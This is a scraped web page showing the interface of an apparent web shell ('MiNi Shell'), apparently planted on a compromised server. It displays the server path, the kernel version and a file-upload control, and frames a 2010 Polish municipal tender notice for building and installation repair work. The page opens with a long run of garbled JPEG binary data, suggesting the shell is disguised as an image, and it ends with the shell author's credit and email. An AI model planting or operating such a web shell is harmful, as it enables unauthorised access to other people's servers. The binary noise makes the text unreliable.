JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100121/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100121/18790-N-2010.html

<p class="kh_header"><b>Jastrzębie-Zdrój: Usuwanie usterek ogólnobudowlanych oraz na instalacjach wod-kan, c.o., gaz w budynkach mieszkalnych i użytkowych oraz na terenach wokół budynków administrowanych przez MZN w Jastrzębiu Zdroju</b><br>
<b>Numer ogłoszenia: 18790 - 2010; data zamieszczenia: 21.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Zarząd Nieruchomości , ul. 1-go Maja 55, 44-330 Jastrzębie-Zdrój, woj. śląskie, tel. 032 4787001, faks 032 4762952.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mzn.sjz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usuwanie usterek ogólnobudowlanych oraz na instalacjach wod-kan, c.o., gaz w budynkach mieszkalnych i użytkowych oraz na terenach wokół budynków administrowanych przez MZN w Jastrzębiu Zdroju.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> W zakresie robót usterkowych może nastąpić konieczność wykonania następujących robót:
ZADANIE NR 1:
1) Roboty dekarskie:
-usuwanie usterek związanych z nieszczelnościami w pokryciach dachowych, obróbkach blacharskich, rynnach i rurach spustowych oraz wyłazach dachowych,
- naprawa i uszczelnienie obróbek blacharskich i pokrycia daszków nad wejściami,
- udrażnianie przykanalików kanalizacji deszczowej,
- naprawa lub wymiana parapetów okien klatki schodowej,
-usuwanie gniazd gołębi w rynnach i na parapetach klatki schodowej,
-konserwacja pokrycia dachowego,
- realizacja protokołów kominiarskich w zakresie napraw kominów i przewodów kominowych,
-uszczelnienie lub wymiana wywiewek kanalizacyjnych w stropodachu i ponad dachem,
- inne roboty dekarskie związane z eksploatacją budynku.
2) Roboty ogólnobudowlane:
- naprawy tynków wewnętrznych i zewnętrznych,
- usuwanie skutków przecieków z dachu lub awarii instalacji c.o. lub wod.-kan. na ścianach, sufitach i posadzkach w pomieszczeniach wspólnych oraz mieszkaniach lokatorskich,
- naprawa lub wymiana opasek wokół budynku,
-usuwanie napisów graffiti,
- naprawa uszkodzonych elementów wejść do budynku, schodów, balustrad, krat okiennych itp.,
- uzupełnianie lub wymiana posadzek w piwnicach lub korytarzach,
- naprawy balkonów lub gzymsów,
-uzupełnianie ubytków tynku kominów ponad dachem oraz żelbetowych czap kominowych,
-inne roboty budowlane związane z eksploatacją budynku.
3) Inne nieprzewidziane losowo przypadki.
4) Dyspozycyjność przez cały okres realizacji zadania. 

ZADANIE NR 2:
1) Roboty instalacyjne wodno- kanalizacyjne:
-usuwanie przecieków na instalacji wodnej oraz kształtkach (uszczelnienie taśmą teflonową) i ponowne skręcenie,
-wymiana kształtek i odcinków rurociągów (mufek, śrubunków, nypli, zaworów, złączek, rur) w technologii PP, ocynk., lub miedzianej,
- udrożnienie kanalizacji sanitarnej lub deszczowej (przykanaliki i piony),
- usuwanie przecieków na złączach poprzez uszczelnienie,
- wymiana kształtek i instalacji PCV (kolanko, trójnik, mufy, redukcje, rewizje, rurociągi itp.),
2) Roboty instalacyjne centralnego ogrzewania:
- usuwanie przecieków na zaworach, śrubunkach, grzejnikach, rurach, odpowietrznikach,
- wymiana zaworów, śrubunków, grzejników i innych elementów c.o.),
3) Roboty instalacyjne gazowe:
- usuwanie przecieków na zaworach gazowych, kształtkach oraz złączach rur,
- wymiana kształtek instalacji gazowej i odcinków rurociągów - śrubunków, mufek, nypli, kolan, zaworów, rur,
- spawanie instalacji gazowych - rur (likwidacja przecieków),
4) Inne nieprzewidziane losowo przypadki.
5) Dyspozycyjność przez cały okres realizacji zadania. 
Wyżej wymienione roboty będą rozliczane na podstawie kosztorysu powykonawczego z uwzględnieniem oferowanej rg i wskaźników cenotwórczych.  
Powyższe roboty będą wykonywane według potrzeb na każdorazowe polecenie Działu Eksploatacyjno-Technicznego. Termin realizacji polecenia w zależności od charakteru zdarzenia będzie każdorazowo określony w poleceniu wydanym przez Dział Eksploatacyjno-Techniczny.
W formularzu oferty należy podać wskaźniki cenotwórcze:
ZADANIE 1: 
  a/ cena 1 rg  z narzutami 
  b/ koszty pośrednie do sprzętu / nie mogą przekroczyć średniego wskaźnika narzutów kosztów
       pośrednich określonego w  Sekocenbudzie  za trzeci kwartał 2009  wynoszący 67,5 % dla 
      robót ogólno-budowlanych remontowych/
  c/ zysk do sprzętu  / nie może przekroczyć średniego wskaźnika narzutów kosztów zysku określonego
      w  Sekocenbudzie  za trzeci kwartał 2009  wynoszący 12,4 %  dla robót ogólno-budowlanych     	remontowych/
  d/ koszty zakupu  / nie mogą przekroczyć średniego wskaźnika narzutów kosztów zakupu  określonego 
      w  Sekocenbudzie za trzeci kwartał 2009  wynoszący 8,0 %  dla robót ogólno-budowlanych 	remontowych /
   e/ czas reakcji. 
Ceny materiałów  i sprzętu do robót będą obowiązywały zgodnie ze średnią ceną zamieszczoną w Sekocenbudzie za dany miesiąc rozliczeniowy.
ZADANIE 2:
  a/ cena 1 rg  z narzutami 
   b/ koszty pośrednie do sprzętu / nie mogą przekroczyć średniego wskaźnika narzutów kosztów
       pośrednich określonego w  Sekocenbudzie  za trzeci kwartał 2009  wynoszący 66,7 % dla 
      robót instalacji sanitarnych/
   c/ zysk do sprzętu  / nie może przekroczyć średniego wskaźnika narzutów kosztów zysku określonego
      w  Sekocenbudzie  za trzeci kwartał 2009  wynoszący 12,2 %  dla robót instalacji sanitarnych/
   d/ koszty zakupu  / nie mogą przekroczyć średniego wskaźnika narzutów kosztów zakupu  określonego 
      w  Sekocenbudzie za trzeci kwartał 2009  wynoszący 7,3 %  dla robót instalacji sanitarnych/
    e/ czas reakcji. 
Ceny materiałów  i sprzętu do robót będą obowiązywały zgodnie ze średnią ceną zamieszczoną w Sekocenbudzie za dany miesiąc rozliczeniowy.
Podane wskaźniki cenotwórcze są obowiązujące w całym okresie ważności oferty i pozostają stałe przez okres realizacji zamówienia i nie będą podlegać waloryzacji.
Za wypadki i szkody powstałe w wyniku prowadzenia robót odpowiada Wykonawca. 

Zadanie jest finansowane z budżetu Miejskiego Zarządu Nieruchomości  w Jastrzębiu Zdroju w roku 2010.

Warunki techniczne.
Przedmiot zamówienia musi być wykonany w technologii zgodnej ze specyfikacją techniczną wykonania           i odbioru robót ( załączniki do siwz - 4 szt),   wiedzą techniczną, przy zachowaniu optymalizacji wykonania.
Do wykonania zadania będą użyte materiały posiadające atesty, certyfikaty, dopuszczenie do stosowania, nie posiadające uszkodzeń. 
Za wypadki i szkody powstałe na placu budowy odpowiada wykonawca. 
Odpowiedzialność cywilną wobec osób trzecich jak i z tytułu zdarzeń losowych przyjmuje na siebie wykonawca. 
Wykonawca jest zobowiązany przestrzegać rygorów wynikających z Prawa budowlanego. 
W czasie realizacji robót Wykonawca będzie utrzymywał na swój koszt i ryzyko teren robót w stanie wolnym od przeszkód komunikacyjnych oraz będzie usuwał wszelkie zbędne materiały, odpady oraz niepotrzebne urządzenia prowizoryczne..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.30.00.00-0, 45.00.00.00-1, 45.26.10.00-3, 45.21.00.00-2, 45.32.40.00-4, 45.33.00.00-9, 45.31.12.00-2, 45.33.31.00-6, 45.40.00.00-1, 45.33.30.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium 
Zadanie nr 1 - 3500,00 zł (trzy tysiące pięćset  zł 00/100)
Zadanie nr 2 - 1500,00 zł (tysiąc pięćset zł 00/100)<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące:
1) posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania;
2) posiadania wiedzy i doświadczenia;
3) dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia;
4) sytuacji ekonomicznej i finansowej. 

Opis sposobu dokonywania oceny spełniania warunków, o których mowa:

a) w pkt 8.1.2. siwz:
     - wykonał w okresie ostatnich 5 lat przed upływem terminu składania ofert 3 zadania o charakterze  podobnym do przedmiotu zamówienia o łącznej  wartości min.: Zadanie Nr 1: 150.000,00 zł brutto, Zadanie Nr 2: 70.000,00 zł brutto. Przy wykazie i referencjach należy wyszczególnić zakres wykonywanych robót. W przypadku składania oferty na 2 zadania należy potwierdzić wykonanie  robót o wartości łącznej 220.000,00 zł brutto.  

b) w pkt 8.1.3. siwz:
ZADANIE NR 1:
- dysponuje lub będzie dysponować przy wykonywanych pracach pracownikami nadzoru posiadającymi uprawnienia niezbędne do wykonywania prac wymagane przepisami ustawy Prawo budowlane tj. uprawnienia budowlane o specjalności  konstrukcyjno-budowlanej co najmniej w ograniczonym zakresie osoby przyjmującej obowiązki kierownika budowy.
ZADANIE NR 2:
- dysponuje lub będzie dysponować przy wykonywanych pracach pracownikami nadzoru posiadającymi uprawnienia niezbędne do wykonywania prac wymagane przepisami ustawy Prawo budowlane tj. uprawnienia instalacyjne co najmniej w ograniczonym zakresie do sieci i instalacji sanitarnych osoby przyjmującej obowiązki kierownika robót instalacyjnych.
Spełnienie wymogów podanych w punktach 8.1 - 8.2 siwz, należy potwierdzić poprzez złożenie stosownego oświadczenia według załącznika nr 2 do siwz, oraz przedłożenie dokumentów, o których mowa w pkt 9 siwz 

Ocena spełnienia warunków wymaganych od wykonawców zostanie dokonana wg formuły spełnia - nie spełnia (oddzielnie dla każdego z zadań).
Nie spełnienie chociażby jednego warunku, skutkować będzie wykluczeniem Wykonawcy z postępowania / odrzuceniem jego oferty..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> dowód wniesienia wadium w wysokości: 5.000,00 zł słownie: pięć tysięcy złotych, w tym Zadanie nr 1: 3.500,00 zł, Zadanie nr 2: 1.500,00 zł 
      (w przypadku złożenia wadium w innej formie niż pieniądz, kopię potwierdzenia złożenia wadium należy umieścić w ofercie a oryginał wraz z ofertą w Dziale Logistyki),
- oświadczenie wg załącznika nr 2 do siwz,
- aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art.24 ust.1 pkt 2 ustawy, wystawionego  nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, a w stosunku do osób fizycznych oświadczenie wg załącznika nr 3 do siwz w zakresie art.24 ust.1 pkt 2 siwz,
-aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające,  że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał  przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, wystawione nie wcześniej niż  3 miesiące przed upływem terminu składania ofert  (licząc do dnia składania oferty włącznie),
-aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, wystawione nie wcześniej niż  3 miesiące przed upływem terminu składania ofert  (licząc do dnia składania oferty włącznie),
-wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi oraz instalacyjnymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami - wg załącznika nr 4 do siwz,
-oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień - wg załącznika nr 5 do siwz, 
- pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia lub inny dokument z którego wynikać będzie, że wykonawca takimi osobami będzie dysponował, jeżeli przy realizacji zadania polegać będzie na osobach zdolnych do wykonania zamówienia innego podmiotu,
-wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia wykonanych w ciągu ostatnich 5 lat przed upływem terminu składania ofert z podaniem ich rodzaju, wartości, daty i miejsca wykonania- wg załącznika nr 6 do siwz,
- dokumenty potwierdzające, że roboty wykazane w załączniku nr 6 do siwz zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone (np. referencje, protokoły odbioru końcowego itp.),

Uwaga! Przeliczenie wartości zadań podanych w euro odbywać się będzie wg kursu wprowadzonego właściwym Rozporządzeniem Prezesa Rady Ministrów w sprawie średniego kursu złotego w stosunku do euro stanowiącego podstawę przeliczania wartości zamówień publicznych obowiązującego w dniu opublikowania ogłoszenia o niniejszym zamówieniu.

-pełnomocnictwo do reprezentowania wykonawcy w postępowaniu, z którego wynika zakres, podpisane przez osoby uprawnione do reprezentowania Firmy (jeżeli wykonawca jest reprezentowany przez pełnomocnika lub jeżeli istnieje ustawowy obowiązek ustanowienia pełnomocnika - jak w punkcie 10 i 11 siwz). 
      Uwaga: pełnomocnictwo powinno być przedstawione w oryginale lub kserokopii poświadczonej notarialnie.
Uwaga: w/w dokumenty winny potwierdzać spełnianie poszczególnych warunków na dzień  składania ofert.
Dokumenty przedstawione w formie kserokopii winny być poświadczone i opatrzone klauzulą za zgodność z oryginałem przez osoby do tego uprawnione. Dokument wielostronicowy przedłożony w formie kserokopii winien być potwierdzony za zgodność z oryginałem  na każdej stronie. 
   Powyższa forma dotyczy również dokumentów uzupełnianych w myśl art.26 ust.3 ustawy Prawo   zamówień publicznych.
Kwestie dotyczące rodzajów dokumentów składanych przez wykonawców mających siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej reguluje § 4 Rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2009 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form w jakich te dokumenty mogą być składane ( Dz.U. z 2009 r. nr 226 poz.1817).
Złożenie dokumentu w niewłaściwej formie (np. nie poświadczone przez wykonawcę za zgodność z oryginałem odpisy lub kopie) traktowane będzie jak jego brak..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 70</li>
<li>2 - koszty pośrednie do sprzętu - 10</li>
<li>3 - zysk do sprzętu - 5</li>
<li>4 - koszty zakupu - 5</li>
<li>5 - czas reakcji - 10</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.mzn.sjz.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Zarząd Nieruchomości w Jastrzębiu Zdroju ul. 1 Maja 55, 44-330 Jastrzębie Zdrój pok. nr 8.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.02.2010 godzina 09:00, miejsce: Miejski Zarząd Nieruchomości w Jastrzębiu Zdroju ul. 1 Maja 55, 44-330 Jastrzębie Zdrój pok. nr 8.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com